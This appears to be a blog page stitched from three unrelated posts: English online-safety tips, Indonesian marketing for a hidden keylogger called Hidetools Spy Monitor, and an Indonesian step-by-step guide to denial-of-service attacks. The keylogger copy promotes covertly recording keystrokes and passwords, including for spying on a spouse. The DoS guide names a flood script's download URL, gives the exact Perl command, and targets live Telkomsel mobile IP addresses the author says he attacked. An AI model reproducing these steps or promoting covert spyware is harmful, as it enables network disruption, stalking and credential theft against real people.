1. Always install a good antivirus software and keep it up-to-date. Also install a good anti-spyware to keep your PC away from spywares. Click Here for a list of recommended anti-spyware softwares.
2. Always visit known and trusted websites. If you are about to visit an unknown website, ensure that you do not click on suspectable links and banners.
3. Perform a virus scan on the files/email attachments that you download before executing them.
4. Regularly Update your operating system and browser software. For a better security it is recommended that you surf the Internet through the latest version of your browser program.
5. Never share your password (email, bank logins etc.) with any one for any reason. Choose a strong password (A blend of alphanumeric+special symbols) and change it regularly, eg. every 3 months. Avoid using easy-to-guess passwords. (ex. pet’s name or kid’s name)
6. Always type the URL of the website in your browser’s address bar to enter the login pages. For ex. To login to your Gmail account type http://mail.google.com 
7. Before you enter your password on any login page, ensure that you see https instead of http. ex. https://mail.google.com instead of http://mail.google.com. HTTPS protocol implements SSL (Secure Sockets Layer) and provide better security than a normal HTTP. For more information on HTTPS and SSL see Know More About Secure Sockets Layer (SSL).
8. Beware of phishing emails! Do not respond to any email that request you to update your login details by clicking on a link in the body of the email. Such links can lead to Fake Login Pages (Spoofed Pages). For more information on phishing refer What is Phishing?. Also refer How to Protect an Email Account from being Hacked.
9. Always hit the logout button to close your login session rather than abruptly terminating the browser window. Also clear your web browser caches after every session to remove the temporary files stored in the memory and hard disk of your PC.
10. Avoid (Stop) using any public computers or computers in the Internet cafes to access any sensitive/confidential information. Also avoid such computers to login to your email/bank accounts. You cannot be sure if any spyware, keystroke-logger, password-sniffer and other malicious programs have not been installed on such a PC.
By following the above 10 tips your online security can be guaranteed upto 90%. I hope this will help my readers for keeping themselves safe from any of the online insecurities. Cheers! Pass your comments.

Keyloger Hidetools Spy Monitor

Hidetools Spy Monitor adalah perangkat lunak mata-mata komputer. pengguna lakukan pada komputer Anda (keystrokes diketik, situs web yang dikunjungi, aktivitas sistem, program-program digunakan, screenshot dan lebih). Hidetools Spy Monitor dapat secara otomatis membuat laporan log dan mengirimnya ke alamat email Anda. Hal ini memungkinkan Anda untuk memonitor PC anda dari setiap tempat di mana Anda dapat memeriksa email Anda. Spy Monitor Hidetools SEPENUHNYA disembunyikan dari pengguna lain. Tidak ada akan tahu program ini berjalan. Perangkat lunak mata-mata kita sempurna untuk karyawan pemantauan, pasangan pemantauan atau kontrol orangtua.

Fitur:
Spy Monitor Hidetools menyediakan banyak fitur pemantauan komputer penting. Hal ini mudah digunakan software monitoring meliputi kuat keylogger, mengambil screenshot, program dan website penebangan, pemantauan aktivitas komputer.
• keystrokes diketik
Spy Monitor diam-diam Hidetools catatan setiap penekanan tombol diketik di komputer Anda bersama aplikasi judul dan waktu. Juga, memungkinkan Anda untuk merekam password dengan mudah. Setiap pengguna dapat dipantau.
• Website Dikunjungi
Spy Monitor Hidetools catatan semua alamat situs web (URL) bersama dengan judul situs dan tanggal / waktu kunjungan. Program mendukung versi terbaru dari browser berikut: Internet Explorer, Netscape, Opera, Mozilla Firefox dan America Online.
• Aplikasi Kegiatan Logging
Spy Monitor Hidetools melacak semua program yang digunakan pada komputer Anda. Log juga termasuk ketika aplikasi diaktifkan, berhenti, dan berapa lama itu benar-benar digunakan.
• Capturing Screenshot
Spy Monitor Hidetools menangkap screenshot dari layar komputer pada interval yang ditentukan oleh kamu. Screenshot dapat menangkap sesering sekali per menit. Melihat apa yang pengguna yang lakukan pada waktu itu!
• Komputer Activity
Program kami mengontrol waktu yang dihabiskan pengguna di komputer Anda. Spy Monitor Hidetools log semua aktivitas sistem (shutdowns dan pengguna logons).
• Remote Monitoring
Perangkat lunak mata-mata kami dapat secara otomatis mengirim laporan log ke alamat email Anda. Ini memungkinkan Anda untuk memonitor PC anda dari setiap tempat di mana Anda bisa mengecek email Anda. Anda dapat termasuk atau semua pilihan laporan, yang memungkinkan Anda untuk mengirim hanya aktivitas yang Anda inginkan ke email Anda alamat.
• Program Gaib
Program bekerja diam-diam dan tak seorang pun bisa mendeteksinya. Hanya Anda akan tahu bahwa mata-mata Monitor diinstal!
• Password Protection
Hidetools Spy Monitor dilindungi dengan sandi untuk mencegah pemantauan mematikan dan pilihan perubahan. Hanya orang yang mengetahui hotkey khusus dan password dapat mengakses program.
• Windows Vista
Program ini dirancang untuk Windows Vista/98/2000/NT/XP.
• Program gunakan:
Spy Monitor Hidetools dapat digunakan oleh orang tua hati-hati, khawatir pasangan, majikan, sekolah, kantor-kantor pemerintah, dll
• Parental Control
Banyak orangtua khawatir apa yang anak-anak mereka lakukan di komputer. Apakah mereka melakukan pekerjaan rumah atau bermain? Tua ingin melindungi mereka dari percakapan dengan orang asing, penyerangan website dan sebagainya. Dengan Hidetools Spy Monitor Anda akan dapat melihat semua anak-anak Anda aktivitas komputer dan mendeteksi masalah.
• Karyawan Monitoring
Komputer adalah sarana utama kerja dan sarana utama hiburan. Sekarang majikan telah kecemasan baru – instant messenger, surfing internet, on-line games, e-mail, chatting, situs porno, dll Dengan program kami, Anda akan menemukan masalah dengan para karyawan, mencegah informasi penting pencurian, meningkatkan disiplin dan meningkatkan produktivitas perusahaan anda!
• Pasangan Monitoring
Pasangan monitoring software adalah cara termudah untuk menemukan kebenaran tentang pasangan Anda dan mengungkap kecurigaan. Spy Monitor Hidetools sama sekali tidak terlihat sehingga adalah yang paling berbahaya metode. Anda hanya perlu menginstal perangkat lunak kami dan laporan log rinci akan dikirim ke alamat e-mail. Apa yang dapat menjadi cara yang lebih mudah untuk menghilangkan kecurigaan Anda yang merusak hubungan?
• Sekolah dan Institusi
Perangkat lunak kami membantu lembaga-lembaga publik untuk mencegah penggunaan komputer yang tidak cocok dan komputer Wreckers.
• Kontrol Pribadi
Dengan Hidetools Spy Monitor Anda dapat melacak jika komputer Anda digunakan tanpa izin Anda saat Anda sedang pergi dan bagaimana. Hal ini memungkinkan Anda untuk melindungi privasi dan keamanan Anda.
• File Backup
Menggunakan Hidetools Spy Monitor Anda dapat menghemat waktu Anda dengan mencegah kerusakan data insidentil.

DDOS/DOS Kompi tanpa pake php shell


1. download dan instal strawberry perl ,trus ketik di google :strawberry perl
    bisa di download di sini programnya : http://strawberryperl.com/
    Download Strawberry Perl 5.12.2.0
    XP/2003/Vista/2008/Win7, English, 39MB, November 2010 (release notes)

2. setelah di download dan di instal....,kita download angry ip scanner ,
    http://download.cnet.com/Angry-IP-Scanner/3000-2085_4-10045978.html
    terus jalankan ip scanner dan lu scan ip telkomsel yang masih hidup.kenapa
    gua rekomendasikan telkomsel. karena ini target gampang buat di dos,lum ada firewalnya..         
 kemungkinan besar target adalah modem usb telkomsel flash,aku juga lum paham, karena lum nyoba konek ke internet pakai ip telkomsel. ane dapat ip telkomsel itu dari mirc jakarta dal.net

3.kita cari di google script buat nge dosnya pakai udpflood
   lu lu pada bisa ketik di google dgn kyword: udpflood.pl atau udp.pl
   atau ke sini : http://rc.vc/files/perl/udpflood.pl
   setelah itu kita save ke notepad udp.pl bisa juga udp.txt bisa juga. mempan juga buat nge dos...
  dan kita masukin ke komputer kita di : C:\WINDOWS\system32

4. kita klik cmd di : C:\WINDOWS\system32 . cmd adanya di sitem 32 komp windows os''

5.kita ping dulu targetnya.. biar kita bisa tau targetnya down apa nggak,time out apa nggak nya.. biar kita tau..
   contoh: ping 182.2.1.5 -t
6.jalankan exploit upd.pl tadi di cmd.
   dengan perintah
   ==========================
   perl udp.pl ip port time
   contoh: ping
   perl udp.pl 182.2.1.5 80 999999999999999999999999999999999999999
   ==============
   di mana :

   perl udp.pl : exploit dos

   182.2.1.5 : ip adress telkomsel

   80 : port target yang mau kita dos

   99999999999999999999999999999999999999: paket data yang kita kirim

   ========================

  dan kita tinggal tunggu tuh ip adress yang kita ping. time out dah pass kita habis jalankan coommand itu...

  =============

  yang ane coba sih dari warnet speedy. ngehajar ip telkomsel flash....

  ==============

  oke. mungkin segitu aja dulu... thank buat semuanya :) ,barangkali ada yang mau nambahin, silahkan..

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More